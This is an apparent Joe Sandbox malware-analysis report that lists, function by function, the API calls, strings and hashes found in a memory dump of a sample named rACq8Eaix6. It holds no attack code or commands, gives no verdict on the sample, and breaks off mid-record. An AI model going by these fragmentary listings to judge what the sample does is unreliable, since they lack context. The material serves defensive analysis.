Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 049bf9425aea7d88c84e01771979dcbffcb58175ee2d7f0beb62b58c6d3237af
Instruction ID: 30c3af72fbd1e3b2491a138e6e7215d177705c9452f67d2f28adb9f441007171
Opcode Fuzzy Hash: 049bf9425aea7d88c84e01771979dcbffcb58175ee2d7f0beb62b58c6d3237af
Instruction Fuzzy Hash: E921BEB5500308BFEB119B61CC85FBF7BEDFB48745F14412AF845E7280EA248E85A7A0

Function 00C563E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00BD1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00BD1D73
Part of subcall function 00BD1D35: GetStockObject.GDI32(00000011), ref: 00BD1D87
Part of subcall function 00BD1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BD1D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00C56461
LoadLibraryW.KERNEL32(?), ref: 00C56468
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00C5647D
DestroyWindow.USER32(?), ref: 00C56485

Strings

SysAnimate32, xrefs: 00C5643C

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 0f6a6117cf399daf2255dbc847e59545b9e70283dd375ab1e38ee511697aef45
Instruction ID: f85917f092baba082203dda09fae832586c047a13acef98e8870d84f91ebd590
Opcode Fuzzy Hash: 0f6a6117cf399daf2255dbc847e59545b9e70283dd375ab1e38ee511697aef45
Instruction Fuzzy Hash: BC218E79100205BBEF108F64DC80FBB77A9EB58365F904629FD20931A0D771DC85A764

Function 00C36D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00C36DBC
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C36DEF
GetStdHandle.KERNEL32(0000000C), ref: 00C36E01
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00C36E3B

Strings

nul, xrefs: 00C36E36

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: d10d0e07ca86aec0610bb069502c8559ed5bf7c7767846f56c348704c390865e
Instruction ID: a72c72c8464f9d9ec954ca32c61738c1ca04f0643ae1c8b17d0ab495c2fc70fd
Opcode Fuzzy Hash: d10d0e07ca86aec0610bb069502c8559ed5bf7c7767846f56c348704c390865e
Instruction Fuzzy Hash: 4E218E74610309BBDB20AF29DC04B9E7BB4EF45724F208A29FCB0D72D0DB709A559B50

Function 00C36E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00C36E89
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C36EBB
GetStdHandle.KERNEL32(000000F6), ref: 00C36ECC
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00C36F06

Strings

nul, xrefs: 00C36F01

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 24f03707eb1ecfeda318638de202a01683b8ef14b531af639a02c7d1cb4c521c
Instruction ID: 23cf825163b6a58cfe91b4e335f30bbfb45ff3ed1b377eb378d723cd3280da9f
Opcode Fuzzy Hash: 24f03707eb1ecfeda318638de202a01683b8ef14b531af639a02c7d1cb4c521c
Instruction Fuzzy Hash: 86219079510305ABDB209F69DC04B9A77E8AF45720F208A19F8B1E72D0DB70A955CB50

Function 00C3AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00C3AC54
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00C3ACA8
__swprintf.LIBCMT ref: 00C3ACC1
SetErrorMode.KERNEL32(00000000,00000001,00000000,00C5F910), ref: 00C3ACFF

Strings

%lu, xrefs: 00C3ACBB

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: d8b4c46fccfde10d0dfcb241ad6fb77624cac7e81983f7ddb77645eaef986a74
Instruction ID: 595fedce3b0ed6e1f0741c423b60979420bbfae5cfbd7a6fd0d8cc7f6fda2a60
Opcode Fuzzy Hash: d8b4c46fccfde10d0dfcb241ad6fb77624cac7e81983f7ddb77645eaef986a74
Instruction Fuzzy Hash: E521A135A00209AFCB10DF65CD45EAEBBF8EF49715B0040A9F909EB351DB31EA41DB61

Function 00C31AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00C31B19

Strings

EXISTS, xrefs: 00C31B41
APPEND, xrefs: 00C31B52
KEYS, xrefs: 00C31B30
REMOVE, xrefs: 00C31B1F

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: 50f39f951fb47607e1b3fa86c493a887494423ba3c9104131ce9b412e3897a27
Instruction ID: 4eea334865b21b9253f91d48a33f23c11dd0371e22a8d167343ab76d0816bad1
Opcode Fuzzy Hash: 50f39f951fb47607e1b3fa86c493a887494423ba3c9104131ce9b412e3897a27
Instruction Fuzzy Hash: 37115EB09202098FCF00EF94D9619FEF7B4FF25308F5444A9D824676A2EB325D0ACB54

Function 00C4EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00C4EC07
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00C4EC37
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00C4ED6A
CloseHandle.KERNEL32(?), ref: 00C4EDEB

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 0e23bd80a1af3958b30f7fd59b749395e25da5eea22e2279f6e19a5628c30ec8
Instruction ID: 33e6f3ceba2953b361b33060afc66e225bfe5b190aedd34a50728f9309fdbd7b
Opcode Fuzzy Hash: 0e23bd80a1af3958b30f7fd59b749395e25da5eea22e2279f6e19a5628c30ec8
Instruction Fuzzy Hash: FE815E756007019FD720EF28C886F2AB7E5BF44B10F05886EF9A9DB3D2E671AD418B51

Function 00BF541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00BF547B
_memcpy_s.LIBCMT ref: 00BF54ED
__read_nolock.LIBCMT ref: 00BF554B
__filbuf.LIBCMT ref: 00BF556E
_memset.LIBCMT ref: 00BF55B2

Part of subcall function 00BF8B28: __getptd_noexit.LIBCMT ref: 00BF8B28

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
Instruction ID: a80d14d3b80d3b644badbefc410ae61746d99a94c138f6feed4a012959267006
Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
Instruction Fuzzy Hash: BA51B470A00B0D9BDB348FA9D88067E77E2EF50321F2487A9FB25972D5D7709D598B40

Function 00C50037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00BD7DE1: _memmove.LIBCMT ref: 00BD7E22

Part of subcall function 00C50E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C4FDAD,?,?), ref: 00C50E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C500FD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C5013C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00C50183
RegCloseKey.ADVAPI32(?,?), ref: 00C501AF
RegCloseKey.ADVAPI32(00000000), ref: 00C501BC

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 91398924c1cdfd97083c159020a634f76b0851db98b2a5715a3984e68126056d
Instruction ID: dfaf0778fe399af9fd4f86a76db4a88ae1e6075ee799cc3bf9e5cb99359bbdfc
Opcode Fuzzy Hash: 91398924c1cdfd97083c159020a634f76b0851db98b2a5715a3984e68126056d
Instruction Fuzzy Hash: 09515731208204AFC714EF58C881E6FB7E9AF84314F54496EF995872A2EB31E949CB56

Function 00C4D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00BD9837: __itow.LIBCMT ref: 00BD9862
Part of subcall function 00BD9837: __swprintf.LIBCMT ref: 00BD98AC

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00C4D927
GetProcAddress.KERNEL32(00000000,?), ref: 00C4D9AA
GetProcAddress.KERNEL32(00000000,00000000), ref: 00C4D9C6
GetProcAddress.KERNEL32(00000000,?), ref: 00C4DA07
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00C4DA21

Part of subcall function 00BD5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C37896,?,?,00000000), ref: 00BD5A2C
Part of subcall function 00BD5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C37896,?,?,00000000,?,?), ref: 00BD5A50

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: ec0d02ac99cfe2cebf444b145f4fa8abd22053a9191d9ba832f654f8a80b04c1
Instruction ID: f0fdbc01f36c333b21b61fc8d891e465b394775f79a7af27f4507e1f9fdeb591
Opcode Fuzzy Hash: ec0d02ac99cfe2cebf444b145f4fa8abd22053a9191d9ba832f654f8a80b04c1
Instruction Fuzzy Hash: 9351F835A00609DFCB14EFA8C4949ADF7F5FF19310B1580AAE856AB312DB31AE45CF91

Function 00C3E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00C3E61F
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00C3E648
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00C3E687

Part of subcall function 00BD9837: __itow.LIBCMT ref: 00BD9862
Part of subcall function 00BD9837: __swprintf.LIBCMT ref: 00BD98AC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00C3E6AC
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00C3E6B4

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 91300bcd0e64c5e745ec096c9ed719235c11034f06ad8bbe69c6d4e47e95b3e9
Instruction ID: b6ecd01e9652b1a9753eb6d677079a3a4ef2025c7bcb6025cf387283a9aa8d7b
Opcode Fuzzy Hash: 91300bcd0e64c5e745ec096c9ed719235c11034f06ad8bbe69c6d4e47e95b3e9
Instruction Fuzzy Hash: 87513D35A00609DFCB01EF64C981AAEBBF5EF09314F1480A9E819AB362DB31ED51DF50

Function 00C5A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c0b4d03c1f24f58cd2e22e35cb057d01f95b9b1eed4906d551c2f6fbe3b8535
Instruction ID: 489096a3e66d5ac3caf82c1c955b761e952d8846b4a7ee69f48faf9d882e1659
Opcode Fuzzy Hash: 0c0b4d03c1f24f58cd2e22e35cb057d01f95b9b1eed4906d551c2f6fbe3b8535
Instruction Fuzzy Hash: 8C41C439904604EFD714DF26CC48FAEBBA4EB49312F140365FD26A72E1CB309E89DA55

Function 00BD2344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00BD2357
ScreenToClient.USER32(00C957B0,?), ref: 00BD2374
GetAsyncKeyState.USER32(00000001), ref: 00BD2399
GetAsyncKeyState.USER32(00000002), ref: 00BD23A7

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 28490d4a4ba2dfdc85727c03464ec691890380dac45d0be598a7346e26a4a9e7
Instruction ID: db23bfd85b85f37e5bafae18bb385389b9e8a286740f787d4efdb39e6df62987
Opcode Fuzzy Hash: 28490d4a4ba2dfdc85727c03464ec691890380dac45d0be598a7346e26a4a9e7
Instruction Fuzzy Hash: 45419F39604105FFCF199F68C884AEDFBB4FB05324F20435AF82992290D7309994DB95

Function 00C263AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C263E7
TranslateAcceleratorW.USER32(?,?,?), ref: 00C26433
TranslateMessage.USER32(?), ref: 00C2645C
DispatchMessageW.USER32(?), ref: 00C26466
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C26475

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: 73156985fa9cfdca660cbbdae379e144e7376b067ebaf22a5f76a58c404ead30
Instruction ID: 351cad4de886c4f5a9c3442bb5ff88a9bbbae68aae4f47c37500b6f1cadb7492
Opcode Fuzzy Hash: 73156985fa9cfdca660cbbdae379e144e7376b067ebaf22a5f76a58c404ead30
Instruction Fuzzy Hash: 3131C531900666EFDB25DFB0EC48BBA7BE8AB01304F14016AE571C39A1E7359685D770

Function 00C28A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00C28A30
PostMessageW.USER32(?,00000201,00000001), ref: 00C28ADA
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00C28AE2
PostMessageW.USER32(?,00000202,00000000), ref: 00C28AF0
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00C28AF8

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 9762d424ec1b8ac0e9d5c30aead43464da7b313af1872114802bb6b1aeaebe91
Instruction ID: 49a6021f73baa8c0386efdaeae3dc4b513a8cb8daff94032df703861e48cf710
Opcode Fuzzy Hash: 9762d424ec1b8ac0e9d5c30aead43464da7b313af1872114802bb6b1aeaebe91
Instruction Fuzzy Hash: D031B171501229EBDB14CF68E94CB9E3BB5EB04316F104229F925E75D0CBB09A54DB90

Function 00C2B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00C2B204
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00C2B221
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00C2B259
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00C2B27F
_wcsstr.LIBCMT ref: 00C2B289

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 3244faea22fae814f9fd69ca542ec62d82493cff43deed5afe44587475d25c83
Instruction ID: da801deb97be4ccef4bfe035ceab84f244a4b1bc419ecd7bb2561f1220ca76ad
Opcode Fuzzy Hash: 3244faea22fae814f9fd69ca542ec62d82493cff43deed5afe44587475d25c83
Instruction Fuzzy Hash: A621F232604314BAEB259B79AC09F7F7BA8DF49720F10817DF905DA1A2EF619D4192A0

Function 00C5B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00BD2612: GetWindowLongW.USER32(?,000000EB), ref: 00BD2623

GetWindowLongW.USER32(?,000000F0), ref: 00C5B192
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00C5B1B7
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00C5B1CF
GetSystemMetrics.USER32(00000004), ref: 00C5B1F8
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00C40E90,00000000), ref: 00C5B216

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 5c8f0dea5d49f3f3241d2f9a8c3f8a3ba97f0790e93d6190ccc5e4ffa560bc78
Instruction ID: 88743f7760cda93efe7cd605d2b14b5e7a6af8f4e7dcce42cb58cefbd498f8d9
Opcode Fuzzy Hash: 5c8f0dea5d49f3f3241d2f9a8c3f8a3ba97f0790e93d6190ccc5e4ffa560bc78
